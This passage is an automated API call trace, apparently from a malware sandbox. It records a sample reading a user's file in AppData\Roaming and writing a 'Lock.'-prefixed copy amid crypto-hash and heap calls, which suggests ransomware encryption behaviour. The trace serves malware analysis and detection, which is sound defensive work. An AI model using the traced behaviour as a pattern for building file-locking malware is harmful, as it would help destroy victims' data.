[0196.521] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0196.521] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.521] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.521] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.521] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.522] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.522] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/CoWnh3Q5rTDnpXdJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cownh3q5rtdnpxdj.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0196.522] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.522] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0196.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0196.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.522] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0196.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0196.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0196.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.524] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0196.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0196.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0196.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0196.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.CoWnh3Q5rTDnpXdJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.cownh3q5rtdnpxdj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0196.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0196.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.525] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0196.526] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0196.526] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0196.526] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0196.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0196.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0196.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0196.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0196.528] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0196.528] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x174f, lpOverlapped=0x0) returned 1 [0196.570] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0196.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x174f) returned 0x24f7260 [0196.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0196.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0196.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0196.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x174f) returned 0x34a2048 [0196.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f7260 | out: hHeap=0x25c0000) returned 1 [0196.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.571] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x174f) returned 0x24f7260 [0196.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f7260 | out: hHeap=0x25c0000) returned 1 [0196.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.572] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0196.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0196.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0196.572] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0196.573] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0196.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0196.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x174f) returned 0x24f7260 [0196.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1898 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0196.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x174f) returned 0x34a37a0 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0196.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0196.575] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.576] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0196.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0196.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.576] PeekMessageW (in: 